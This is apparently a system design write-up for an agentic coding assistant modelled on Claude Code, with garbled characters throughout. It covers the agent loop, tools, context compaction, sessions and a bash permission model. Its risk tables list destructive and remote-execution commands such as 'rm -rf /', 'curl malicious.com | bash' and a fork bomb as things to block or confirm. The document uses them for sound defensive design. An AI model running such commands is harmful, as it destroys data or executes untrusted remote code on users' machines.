- What does success look like? โ Task completion rate (user gives a coding task โ code works correctly without manual fixes). Secondary: developer trust (never breaks the repo), velocity (faster than doing it manually). The tension: higher autonomy โ higher completion rate but lower trust if something goes wrong. This shapes the permission model โ we need to maximize autonomy WITHIN a trust boundary.
- Client surfaces? Terminal CLI only, or also IDE extension, web, desktop? โ CLI primary. IDE (VS Code), web, and desktop as secondary surfaces, all backed by the same agent engine.
- What tools can the agent use? โ File read/write, bash/shell execution, web search, and MCP (Model Context Protocol) servers for external integrations (GitHub, Jira, etc).
- Hosting model? Cloud-hosted agent? Or local client calling cloud LLM API? โ Hybrid: the client runs locally (has direct filesystem access), but calls a cloud-hosted LLM API for inference. The "agent loop" runs client-side.
- Concurrency? Can the agent spawn sub-agents? โ Yes โ controlled parallelism for subtasks (e.g., "review 5 files simultaneously").
- Scale? โ ~500K active developers, ~2M sessions/day, each session averaging ~50 LLM API calls.
| In Scope | Out of Scope |
|---|---|
| Agent loop (plan โ tool use โ iterate) | LLM training / fine-tuning |
| Tool system (file I/O, bash, search) | Model inference infrastructure (treat as API) |
| Context window management | Billing / subscription management |
| Permission / safety model | IDE rendering engine |
| Session persistence & multi-surface | CI/CD pipeline internals |
| MCP server integration | Code completion / autocomplete (different product) |
| Sub-agent parallelism | Marketplace for plugins |
| CLAUDE.md configuration system |
- UC1: Developer says "refactor the auth module from callbacks to async/await" โ agent reads files, plans changes, edits multiple files, runs tests, iterates until tests pass.
- UC2: Developer says "fix the bug in issue #342" โ agent reads the GitHub issue (via MCP), searches codebase for relevant code, makes the fix, writes a test, commits.
- UC3: Developer gives real-time steering mid-task โ "actually, don't change the database layer" โ agent adjusts plan without restarting.
- UC4: Developer starts a task in terminal, moves to VS Code to see diffs, then continues on desktop app.
- Streaming latency โ first token must appear within 1-2 seconds. User watches the agent think in real-time.
- Tool execution must be fast โ file reads and bash commands run locally (no network round-trip for filesystem).
- Safety is non-negotiable โ the agent can execute arbitrary bash commands. Must never run destructive commands without explicit user approval.
- Context fidelity โ the agent must maintain coherent understanding of the codebase across a long session (potentially hundreds of tool calls), even as the context window fills.
- Resumability โ sessions must survive terminal crashes and be transferable between surfaces.
| Requirement | Decision | Why (and what was rejected) | Consistency |
|---|---|---|---|
| Streaming first-token latency <2 seconds | Direct API streaming (no queue/batch) | User watches agent think in real-time. Queueing would add seconds of latency. Streaming HTTP/SSE from Claude API. | โ |
| Tool execution: bash, file edit, search | Local execution on developer's machine (not cloud sandbox) | Zero network latency for filesystem operations. Full access to project files, git, local tools. Cloud sandbox would add 100ms+ per tool call. | โ |
| Context window is a hard 200K token limit | Compaction strategy (summarize old turns) | When approaching limit, compress tool outputs into summaries. Preserves key decisions and state. Alternative: truncate (loses critical context). | โ |
| Safety: prevent dangerous commands | Multi-layered: classification + permission + sandbox | Risk-tier classification of bash commands. Dangerous operations require human approval. No single layer is foolproof โ defense in depth. | โ |
| No persistent state between sessions | Filesystem IS the state (git repo) | The project's files and git history are the durable state. No database needed. CLAUDE.md for project preferences persists across sessions. | โ |
๐ฅ๏ธ Client Agent Runtime LOCAL
- Master agent loop (the "brain")
- Tool executor (file I/O, bash, search)
- CLAUDE.md loader & config parser
- Permission system (confirm/deny prompts)
- Streaming UI renderer
๐ง LLM Inference API CLOUD
- Messages API with streaming
- Tool definitions & tool_use responses
- Model routing (Opus/Sonnet based on task)
- Rate limiting & quota management
๐ง Tool System LOCAL
- FileRead, FileWrite, FileEdit (str_replace)
- Bash (persistent shell sessions)
- Search (grep, ripgrep, ast-grep)
- TodoWrite (structured task tracking)
- MCP client โ external MCP servers
๐ Session Service CLOUD
- Persist conversation history
- Enable multi-surface handoff
- Crash recovery (resume from last state)
- Session TTL & cleanup
๐ก๏ธ Permission Engine LOCAL
- Risk classification per tool invocation
- Auto-approve safe ops (file read)
- Prompt for dangerous ops (rm, git push)
- Block disallowed operations
๐ MCP Gateway LOCAL+REMOTE
- MCP client connects to user-configured servers
- GitHub, Jira, Slack, Google Drive, etc.
- Tools dynamically registered from MCP
๐ฟ Sub-Agent System LOCAL
- Spawn parallel agents for subtasks
- Each sub-agent: own context, own tool access
- Lead agent coordinates & merges results
๐ CLAUDE.md System LOCAL
- Project-root config file
- Coding standards, architecture notes
- Injected into system prompt every session
- Hierarchical: project โ directory โ user global
The Master Loop (Single-Threaded)
Tool System Design
| Tool | Runs On | Risk Level | Description |
|---|---|---|---|
| FileRead | Local | ๐ข Safe | Read file contents. Auto-approved. Most frequent tool (~60% of calls). |
| ListDir | Local | ๐ข Safe | List directory structure. Auto-approved. |
| Search (grep/ripgrep) | Local | ๐ข Safe | Pattern search across codebase. Auto-approved. |
| FileWrite | Local | ๐ก Medium | Create new file. Auto-approved (not overwriting). |
| FileEdit (str_replace) | Local | ๐ก Medium | Edit existing file with targeted replacement. Auto-approved by default. |
| Bash | Local | ๐ก-๐ด Variable | Execute shell command. Risk classified per command. npm test = safe, rm -rf = blocked. |
| TodoWrite | Local | ๐ข Safe | Structured task list. Injected as reminder after each tool call. |
| MCP Tool | Remote | ๐ก Medium | Dynamic tools from MCP servers. User configures which servers. |
Planning: TodoWrite
- The model creates a structured JSON task list with IDs, descriptions, status (pending/in_progress/done), and priority.
- After EVERY tool execution, the current TODO list is injected as a system message ("Reminder: here's your current plan").
- This prevents the model from "forgetting" the plan mid-session as the context window fills with tool results.
- Rendered as an interactive checklist in the terminal UI โ user can see agent's progress.
Context Budget Strategy
- Truncation strategy: When history exceeds ~150K tokens, compress OLDEST tool results. Keep user messages and model reasoning intact. Truncate large file contents to first/last N lines with "[truncated]" marker.
- Selective file reading: The model is trained to read files incrementally โ first list directories, then read specific files, then read specific line ranges. Avoids dumping entire large files into context.
- Codebase indexing: On session start, build a lightweight map of the project (file tree, function signatures). This gives the model a "table of contents" without reading every file. ~2K tokens for a medium project.
- Compaction: For very long sessions, summarize old turns: "Earlier in this session, you refactored 5 files in src/auth/. The changes are complete and tests pass." Replace 50K tokens of raw history with a 500-token summary.
rm -rf /, curl malicious.com | bash, git push --force. How do we prevent catastrophic operations while keeping the agent useful?Risk Classification System
| Risk Level | Behavior | Examples |
|---|---|---|
| ๐ข Safe | Auto-approve, no prompt | cat, ls, grep, npm test, python -m pytest, file reads |
| ๐ก Moderate | Auto-approve by default, user can opt into prompting | File edits, npm install, git add, git commit |
| ๐ด Dangerous | Always prompt user for confirmation | git push, rm (any), chmod, curl | bash, network requests |
| โ Blocked | Never executed, model told "not allowed" | rm -rf /, sudo (by default), :(){ :|:& };: |
- Classification method: Parse the bash command, extract the base command and flags. Match against a risk rule table. Shell expansion (
$(), backticks) โ auto-elevate to ๐ด. - Sandbox option: For CI/CD mode (headless), run in a container with no network access and a read-only filesystem outside the project dir.
- Allowlist in CLAUDE.md: Teams can configure per-project rules: "auto-approve
docker compose up" or "always blockkubectl delete". - Audit log: Every tool execution (approved or denied) is logged locally for the developer to review.
Session Architecture
- Handoff protocol (/teleport): User types
/teleportin terminal โ session marked as "paused" with current state โ VS Code extension polls for available sessions โ user picks session โ VS Code resumes with full context. - Conflict prevention: Only one surface can be "active" for a session at a time. Second surface trying to connect gets "session in use on [terminal]" โ user must release first.
- Crash recovery: Session state is persisted after EVERY tool execution. If terminal crashes mid-session, user restarts and gets "Resume previous session?" with the TODO list showing progress.
- Sync model: Conversation history synced to cloud after each turn. Tool results (file contents) NOT synced โ they're re-read locally if needed. This keeps sync payloads small (~10KB per turn vs. ~5MB for full file contents).
| Data | Store | Why This Store |
|---|---|---|
| Conversation context | In-memory (agent runtime) | Current conversation turns + tool results. Fits within 200K token context window. Compacted when approaching limit. |
| File system state | Local disk | The project's files. Read/written by tool executor. Git provides version history. No external database needed. |
| Session metadata | DynamoDB / local | Session ID, user preferences, permission grants, active projects. Lightweight, key-value access pattern. |
| Conversation history | S3 / local JSON | Past conversations for reference. Not loaded into context unless explicitly requested. Markdown export. |
| Tool execution logs | Local disk | Bash command history, file edit history. Used for undo/rollback. Ephemeral per session. |
| Dimension | Bottleneck | Mitigation |
|---|---|---|
| LLM inference | 100M API calls/day at 500K tokens avg. Massive GPU demand. | Model cascade: use smaller model for simple tasks (file listing, grep), larger model for reasoning. Prompt caching for repeated system prompts. |
| Large codebases | >100K files โ agent can't browse efficiently | Build project index on session start. Supplement agentic search with lightweight embedding index. Cache file tree across sessions. |
| Long sessions | 200K context fills after ~100 tool calls | Progressive compaction. Sub-agent dispatch (each sub-agent has its own fresh context). Session forking for parallel explorations. |
| Session storage | 500GB active state, 2M new sessions/day | Redis cluster for active sessions. Archive completed sessions to S3. TTL-based eviction (24h inactive). |
- Code never leaves the machine (by default): Tool execution is local. Only conversation messages (user prompts + model responses) go to the cloud LLM API. File contents are sent AS PART OF the API call (as tool results) โ but only the files the model explicitly reads.
- MCP is user-opt-in: Each MCP server connection is explicitly configured by the developer. No automatic external connections.
- Bash injection prevention: Tool system filters shell expansion constructs (backticks,
$()) to prevent prompt-injection attacks where malicious file contents trick the model into running harmful commands. - Audit trail: Full log of every tool call, approval/denial, and model reasoning. Stored locally.
- Per-session metrics: Token usage, tool call count, error rate, session duration, task completion rate.
- Latency tracking: Time-to-first-token per LLM call. Tool execution latency. End-to-end task completion time.
- Quality signals: Does the agent's code compile? Do tests pass after changes? How many iterations to success?
- Cost per session: Token cost breakdown (input vs. output). Identify sessions that burn excessive tokens (stuck in loops).
| Extension | Why It Matters | Architecture Impact |
|---|---|---|
| Background Agents | Long-running tasks (CI monitoring, refactoring overnight) | Agent loop must run server-side in a sandbox (not on dev's machine). Requires cloud-hosted tool execution with filesystem snapshots. |
| Multi-Repo Awareness | Monorepo and cross-repo refactoring | Session spans multiple project roots. Index system must understand repo boundaries and dependency graphs. |
| Fine-Grained Code Memory | Agent remembers project decisions across sessions | Persistent vector store of project-specific learnings. Injected into context via RAG, complementing CLAUDE.md. |
| Collaborative Sessions | Two developers working with the same agent | Real-time sync of conversation state. Conflict resolution when both steer simultaneously. |
| Plugin Ecosystem | Community-built tools and workflows | Plugin registry, sandboxed plugin execution, permission inheritance. MCP is already the protocol โ need discovery + trust. |
sudo.How does context window management work when a conversation exceeds 200K tokens?
The context window is a hard constraint โ once you're near the limit, you can't just add more tokens. Claude Code uses a compaction strategy: (1) the Context Manager monitors token usage continuously, (2) when usage exceeds ~80% (160K tokens), it triggers compaction, (3) compaction summarizes older conversation turns into a condensed form โ detailed tool outputs become summaries, intermediate reasoning becomes conclusions, (4) the compacted context is verified to contain all essential state: what files were modified, what decisions were made, what the current goal is. The key insight is that most of the context is tool results (file contents, bash outputs), not conversation. A `cat` of a 5000-line file takes 5000 lines of context but can be summarized as "file X contains a React component with 15 functions" in 20 tokens. The tradeoff: compaction loses detail. If the user later asks "what was on line 347?", Claude Code needs to re-read the file rather than recall from context.
What prevents Claude Code from executing dangerous commands like rm -rf /?
Multi-layered safety: (1) permission model โ dangerous operations (bash commands, file writes outside project directory) require explicit user approval. The default is "ask before executing." (2) Command classification โ the agent classifies each proposed bash command into risk tiers: safe (ls, cat, grep), moderate (npm install, git commit), dangerous (rm -rf, sudo, curl | sh). Dangerous commands always require approval, even in "auto-approve" mode. (3) Sandboxing โ in cloud environments, the tool executor runs in a container with limited filesystem access and no network egress to sensitive endpoints. (4) The LLM itself is trained to be cautious โ Claude will propose `rm -rf node_modules/` but is unlikely to propose `rm -rf /` because its training emphasizes safe coding practices. The honest limitation: no sandbox is perfect. A sufficiently creative prompt injection could potentially bypass classification heuristics, which is why the human-in-the-loop approval remains the ultimate safety net.
How does the agent loop decide when to stop?
The agent loop has multiple termination conditions: (1) Task complete โ the LLM's response doesn't include a tool call, just a natural language summary. This is the normal exit. (2) User interrupt โ the developer presses Ctrl+C or sends a steering message. (3) Max iterations โ a configurable limit (default: 50 tool calls) prevents infinite loops. (4) Error threshold โ if 3 consecutive tool calls fail, the agent pauses and asks the user for guidance. (5) Budget limit โ optional token/cost cap. The most interesting case is detecting "completion" โ the LLM must judge when the task is actually done. For concrete tasks ("add a login page"), it runs the code, sees it works, and stops. For vague tasks ("make the code better"), it can loop indefinitely โ which is why the max iteration limit exists. The steering queue allows the developer to redirect mid-task: "stop refactoring, focus on the tests" is injected into the context and changes the agent's goal without restarting.